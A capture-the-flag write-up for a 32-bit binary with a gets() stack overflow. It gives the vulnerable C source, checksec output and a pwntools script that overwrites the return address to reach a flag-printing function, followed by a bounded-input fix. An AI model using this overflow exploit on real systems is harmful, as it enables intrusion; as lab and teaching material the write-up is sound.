basic_exploitation_001

It is a 32-bit ELF.

file basic_exploitation_001
basic_exploitation_001: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=3e59f379d1f0653db81908d1d3a5eb9dce83816f, not stripped


NX is enabled, but that is nothing to worry about: NX only prevents executing injected code on the stack, and with no canary we can still overwrite the return address and jump into code the binary already contains.

checksec basic_exploitation_001
[*] '/root/dreamhack/basic001/basic_exploitation_001'
    Arch:       i386-32-little
    RELRO:      No RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x8048000)
    Stripped:   No


#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>


void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}


void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);

    signal(SIGALRM, alarm_handler);
    alarm(30);
}


void read_flag() {
    system("cat /flag");
}

int main(int argc, char *argv[]) {

    char buf[0x80];

    initialize();
    
    gets(buf);

    return 0;
}


read_flag is right there in plain sight. gets() has no length limit, so a long input overflows buf[0x80], overwrites the saved return address, and main returns into read_flag instead.


from pwn import *

r = remote('host3.dreamhack.games', 22166)
payload = b'A' * 132          # fill buf[0x80] (128 bytes) plus the 4-byte saved ebp
payload += p32(0x80485b9)     # return address -> read_flag
r.sendline(payload)           # gets() reads up to the newline
r.interactive()
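As an added example that is not part of the challenge or this write-up, here is the fix on the defending side: a bounded line reader (the hypothetical helper read_line_bounded) that replaces the gets(buf) call so the 132-byte payload above can no longer reach the return address.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 0x80   /* same capacity as buf[0x80] in the challenge's main() */

/* Bounded replacement for the gets(buf) call (hypothetical helper, not the
 * challenge's code). gets() takes no length, so a line longer than 0x80
 * bytes runs over the saved ebp and return address sitting above buf.
 * This reader stores at most cap-1 bytes, always NUL-terminates, and
 * drains the remainder of an over-long line so the stream stays in sync.
 * Returns the number of bytes stored, or -1 on EOF before any input;
 * *truncated is set to 1 when bytes had to be discarded. */
long read_line_bounded(FILE *in, char *buf, size_t cap, int *truncated)
{
    size_t n = 0;
    int c = EOF;

    *truncated = 0;
    if (cap == 0)
        return -1;

    while ((c = fgetc(in)) != EOF && c != '\n') {
        if (n + 1 < cap)
            buf[n++] = (char)c;
        else
            *truncated = 1;     /* this byte would have overrun buf */
    }
    buf[n] = '\0';

    if (c == EOF && n == 0 && !*truncated)
        return -1;
    return (long)n;
}

/* main() of the challenge with the fix applied: the 132-byte payload from
 * the write-up is now cut at 127 bytes and the return address is untouched.
 * Returns 0 if the line fit, 1 if it was truncated, -1 on EOF. */
int read_input_safely(FILE *in)
{
    char buf[BUF_SIZE];
    int truncated;

    if (read_line_bounded(in, buf, sizeof buf, &truncated) < 0)
        return -1;
    return truncated ? 1 : 0;
}
```

Calling read_input_safely(stdin) in place of gets(buf) keeps the original behaviour for lines that fit and reports, instead of corrupting the stack, when input had to be cut.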
